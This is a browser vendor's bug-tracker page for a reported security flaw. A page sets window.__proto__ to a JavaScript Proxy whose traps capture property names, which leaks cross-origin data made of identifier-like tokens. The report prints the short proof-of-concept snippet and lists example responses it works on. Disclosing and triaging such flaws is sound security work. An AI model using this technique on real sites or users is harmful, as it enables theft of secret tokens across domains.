Closed
Bug 1099081
Opened 10 years ago
Closed 10 years ago
Cross-site data leak using window.__proto__ = new Proxy
Categories
(Core :: Security, defect)
Core
Security
Tracking
()
RESOLVED
DUPLICATE
of bug 1048535
People
(Reporter: till, Unassigned)
References
()
Details
(Keywords: sec-moderate, wsec-disclosure)
Setting window.__proto__, it's possible to intercept data from other domains as long as the data consists of either a single token that's a valid JS identifier, or a list of such tokens.
See https://twitter.com/steike/status/533198334547468288 for a POC.
It's actually even simpler to implement this using ES6-style proxies:
window.__proto__ = new Proxy({}, {
get: function(target, name) {console.log(name); return true;},
has: function(target, name) {return true}
});
Examples of request results this works for:
"foo05120820e156c2f445f670759be64420" (from the original POC)
"foo,bar"
foo,
bar,
baz"
"foo;bar"
Comment 1•10 years ago
|
||
Calling this sec-moderate (maybe even sec-low?, because it relies on a web app that is not securing its "secret tokens" in a best practice way.
Dan, can you think of something we could do about this?
Keywords: sec-moderate,
wsec-disclosure
Updated•10 years ago
|
Status: NEW → RESOLVED
Closed: 10 years ago
Resolution: --- → DUPLICATE
Comment 3•10 years ago
|
||
This bug has been marked as a duplicate of a restricted bug.
If it's an exact duplicate, we should consider opening up bug 1048535.
You need to log in
before you can comment on or make changes to this bug.
Description
•